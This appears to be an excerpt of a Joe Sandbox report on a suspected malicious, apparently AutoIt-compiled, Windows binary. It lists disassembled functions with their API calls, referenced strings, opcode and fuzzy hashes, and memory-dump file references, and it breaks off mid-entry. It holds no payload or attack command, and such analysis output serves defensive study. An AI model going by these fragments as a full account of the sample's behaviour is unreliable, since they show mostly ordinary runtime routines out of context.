Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 9d7a6031842d029c5380e14bd002dbd3e1e681f49020fdd4e37e304cf45d4131
Instruction ID: 6c5cd9b6adfbcc2fa8461939d019f4b2bb8b4a36160a49ad7368ab7e22301273
Opcode Fuzzy Hash: 9d7a6031842d029c5380e14bd002dbd3e1e681f49020fdd4e37e304cf45d4131
Instruction Fuzzy Hash: 02E0E575910304EFDB019F60C809BAD7BB5EF5C350F108525F95AD7360DB7881519F60

Function 00D4219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D4219B
GetDC.USER32(00000000), ref: 00D421A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D421B1
ReleaseDC.USER32(?), ref: 00D421D2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2300151f952cba1c78f53d3c7b39e092a8710fc1f49d7a17d1b8fe80935751ca
Instruction ID: 0a097ff2077232b7aa0a05e172bdda60489111140bcc27227dd255706ed65748
Opcode Fuzzy Hash: 2300151f952cba1c78f53d3c7b39e092a8710fc1f49d7a17d1b8fe80935751ca
Instruction Fuzzy Hash: FBE0EEB5920304AFCB01AFA0C809B9DBBA5EF5C310F108229F95AE7360EB7891519F60

Function 00D5B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00D5B981

Strings

AutoIt3GUI, xrefs: 00D5B8F9
Container, xrefs: 00D5B8FE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: cfb7f19a367e0c05ac7f0cd0621e4e0814233573f2c8a31c5fc744c0045ae248
Instruction ID: 406c895b63e443ebd45b97f61590b90cd7d5f342654d3a419d0c557d7aa3a1da
Opcode Fuzzy Hash: cfb7f19a367e0c05ac7f0cd0621e4e0814233573f2c8a31c5fc744c0045ae248
Instruction Fuzzy Hash: 25914974600601AFDB24CF24C895A6ABBE8FF48721F14856EED4ACB691DB70E844CB60

Function 00D6B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D1FEC6: _wcscpy.LIBCMT ref: 00D1FEE9

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

__wcsnicmp.LIBCMT ref: 00D6B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D6B361

Strings

LPT, xrefs: 00D6B292

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: d275a19fe6897cfd90ecfadc74eb1783538d50bb64a8468cc0c13ff8cb82c9ad
Instruction ID: d971a7d421dcd7f4068670ac9493cf79a7d6cbf31cf8c657f61ca2005f9594f6
Opcode Fuzzy Hash: d275a19fe6897cfd90ecfadc74eb1783538d50bb64a8468cc0c13ff8cb82c9ad
Instruction Fuzzy Hash: E7615075A00215AFCB14DF98D895EAEB7B4EF08320F15405AF946EB391DB70AE84CB74

Function 00D12AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D12AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D12AE1

Strings

@, xrefs: 00D12AD5

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 87f71b8bf2f64b6d2ee01a780fc5a787b854ac4a8b7d4060724b9c5c08771de9
Instruction ID: de6c05c5f214a7f97f8c6c6c4520f1790b161797aaf953b20628f5f4cff7098f
Opcode Fuzzy Hash: 87f71b8bf2f64b6d2ee01a780fc5a787b854ac4a8b7d4060724b9c5c08771de9
Instruction Fuzzy Hash: AD5147715187449BD320AF14DC96BAFBBE8FF84310F42885DF2D9811A6DB708529CB36

Function 00D699BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D0506B: __fread_nolock.LIBCMT ref: 00D05089

_wcscmp.LIBCMT ref: 00D69AAE
_wcscmp.LIBCMT ref: 00D69AC1

Strings

FILE, xrefs: 00D699FA

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 98047176339b8e0ea137bd3bec2c5761cf6ca13253af87b699b84381a039c0b7
Instruction ID: 81458494c16f4454b13936e64fb0ce97bddd04cc82cb5eb7972cecb7d4cca479
Opcode Fuzzy Hash: 98047176339b8e0ea137bd3bec2c5761cf6ca13253af87b699b84381a039c0b7
Instruction Fuzzy Hash: C441C471A00619BBDF209AA4DC86FEFBBBDDF45714F00006AF904E71C5DA75AA048BB1

Function 00D72882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D72892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00D728C8

Strings

|, xrefs: 00D72899

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: d7309cace5264556addd7f79f92b8226ee1c6d6c6f0484b2a201512fd0fc00ec
Instruction ID: f76d158e3da12bddd4693729727727496e2abd5b889232fdc4a46a060e142521
Opcode Fuzzy Hash: d7309cace5264556addd7f79f92b8226ee1c6d6c6f0484b2a201512fd0fc00ec
Instruction Fuzzy Hash: 47311971D00119ABDF019FA1DC85EEEBFB9FF08300F144029F919A6265EB315A56DB70

Function 00D86CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00D86D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00D86DC2

Strings

static, xrefs: 00D86D22

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c465416283203c14e6c2c4aa869103c654e6b9ea4fb3641992695d8d70f1319d
Instruction ID: 0c34fc8a882c6eceef31d4dd10a84eb6a90dd284ebed10f64dc9726761a11f04
Opcode Fuzzy Hash: c465416283203c14e6c2c4aa869103c654e6b9ea4fb3641992695d8d70f1319d
Instruction Fuzzy Hash: 71316D71210604AEDB10AF68DC80BFB77A9FF48720F149619F9A9D7190DA31EC91CB70

Function 00D62D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D62E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00D62E3B

Strings

0, xrefs: 00D62DF9

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 85c4ad453597810f4cfc910848f14b1eb5b1144591eec9e1495932d0b8a8cff5
Instruction ID: b9f71594f7547bc80b091f194ca9e0e191bcea3738c2e5433bdb2deb780bce73
Opcode Fuzzy Hash: 85c4ad453597810f4cfc910848f14b1eb5b1144591eec9e1495932d0b8a8cff5
Instruction Fuzzy Hash: 2031F531A00709ABEB248F48D945BFEBBB9EF05300F184439F985D61A2D7719944CB70

Function 00D73CDD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00D73D5A

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Strings

, $, xrefs: 00D73D9A
AUTOITCALLVARIABLE%d, xrefs: 00D73D4C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: f64b4365b481c7cf6a3de358b5af5d25e69990a53f9dad93294e3a095e9213d8
Instruction ID: 327043438c306fd523749fe041f737e0eb1b4943bfcd0e878a2aeb5f7c18103f
Opcode Fuzzy Hash: f64b4365b481c7cf6a3de358b5af5d25e69990a53f9dad93294e3a095e9213d8
Instruction Fuzzy Hash: A9214471600219AECF20EF64CC92BEDB7A5FF44700F404495F949AB281D730EA45DBB1

Function 00D86943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D869D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D869DB

Strings

Combobox, xrefs: 00D8699D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: fd81ad7e30b565ccbfe786e3a2ba0541b50a1df3b7e60273b65a799404c95dd0
Instruction ID: 90f1bdd704a8c6555edfb7806588290b28e6a61df63318119e2b051b7e9d4897
Opcode Fuzzy Hash: fd81ad7e30b565ccbfe786e3a2ba0541b50a1df3b7e60273b65a799404c95dd0
Instruction Fuzzy Hash: E811BF71600209AFEF11BF24CC80EEB376AEB883B4F254225F9589B2D0D671DC518BB0

Function 00D86E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00D01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D01D73
Part of subcall function 00D01D35: GetStockObject.GDI32(00000011), ref: 00D01D87
Part of subcall function 00D01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D01D91

GetWindowRect.USER32(00000000,?), ref: 00D86EE0
GetSysColor.USER32(00000012), ref: 00D86EFA

Strings

static, xrefs: 00D86EBD

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 467fabc653be17968edfa285e8df871246c903e55bcbcd29aa92bf1103c64575
Instruction ID: 558d2ff813ec1607ccb5ae6b831fa0ea1a7a0cf274132f8cbe5084fb1ab3f976
Opcode Fuzzy Hash: 467fabc653be17968edfa285e8df871246c903e55bcbcd29aa92bf1103c64575
Instruction Fuzzy Hash: 4921267662020AAFDB05EFA8DD45EFA7BB8FB08314F044629F955D3250E634E8619B60

Function 00D86B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00D86C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00D86C20

Strings

edit, xrefs: 00D86BF5

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 9e5803325769280692b32b08529c652147b564c14e0403fb61d109150d81c63b
Instruction ID: fd723007d4f0c708dfe04f14acec532e5ba0ce563c62308e63252fc508e844f5
Opcode Fuzzy Hash: 9e5803325769280692b32b08529c652147b564c14e0403fb61d109150d81c63b
Instruction Fuzzy Hash: 2C116A71511208ABEB10AF64DC41AEB3B69EB04378F644724F9A5D71E0C675EC919B70

Function 00D62E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D62F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00D62F30

Strings

0, xrefs: 00D62F07

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 55180242ea6cebf1f715083d388b86d46b5fb52a9d31f95b182210d6348f8fd5
Instruction ID: 0ef06f7451704e8a07ed8f1e91b83fa0259213337ee1c676863017a75c96289f
Opcode Fuzzy Hash: 55180242ea6cebf1f715083d388b86d46b5fb52a9d31f95b182210d6348f8fd5
Instruction Fuzzy Hash: D4117931901625ABDB20DA99DC44BB977B9EF05310F1800B5F894E72A2D7B2EE0487B1

Function 00D724CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00D72520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00D72549

Strings

<local>, xrefs: 00D72511

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 34ae06653d994af89f609ca700898886f490947a59740080c4aeae53d7616fc9
Instruction ID: 0fbfdf62ba9a166b67bb2c5e3dcbc51f640163c440603c94de16f8d076546b13
Opcode Fuzzy Hash: 34ae06653d994af89f609ca700898886f490947a59740080c4aeae53d7616fc9
Instruction Fuzzy Hash: 96110670500265BEDB248F518C95EFBFF68FF15355F10C12AF54942140F2709940D6F0

Function 00D780A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D7830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00D780C8,?,00000000,?,?), ref: 00D78322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00D780CB
htons.WSOCK32(00000000,?,00000000), ref: 00D78108

Strings

255.255.255.255, xrefs: 00D780E3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: b816747f3632c3c744d4e530f7da9d8bbd2ce4355fb687afe7efecf0b0ee6b75
Instruction ID: c9501d06bafb8fc09a1f89a2ea3220db8002ae57d3dd27c7f851116b5d286993
Opcode Fuzzy Hash: b816747f3632c3c744d4e530f7da9d8bbd2ce4355fb687afe7efecf0b0ee6b75
Instruction Fuzzy Hash: ED11A534640305ABDB10AF64DC4AFAEB364FF04710F108516FD15972D1EA71A815D775

Function 00D592E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D59355

Strings

ComboBox, xrefs: 00D592F4
ListBox, xrefs: 00D5931F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 0944b98458c59d45bcc9fe18fa4aac228627f00772689f578aa0f7805f841552
Instruction ID: 89488f7e4123782c631244dde77a2512754456d497997ef80df213a30a86a221
Opcode Fuzzy Hash: 0944b98458c59d45bcc9fe18fa4aac228627f00772689f578aa0f7805f841552
Instruction Fuzzy Hash: 93019E71A45219EBDF04EBA4CCA29FEB7A9FF06320B140619BD76572D1DA31690C8770

Function 00D591DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 00D5924D

Strings

ComboBox, xrefs: 00D591EC
ListBox, xrefs: 00D59217

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 48b1fd68398f33a612a5a114849c6c6b0fcd4f4de70ff769f553103c3da54126
Instruction ID: af1f6a258ab01b3f4a3ee5845a95f8b6cc7bd878729be096e8a4787650495a8d
Opcode Fuzzy Hash: 48b1fd68398f33a612a5a114849c6c6b0fcd4f4de70ff769f553103c3da54126
Instruction Fuzzy Hash: A4018471B41209BBCF14EBA0C9A2EFFB7A8DF05311F540119BD16672C1EA256E0C9671

Function 00D59264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 00D592D0

Strings

ComboBox, xrefs: 00D59271
ListBox, xrefs: 00D5929C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
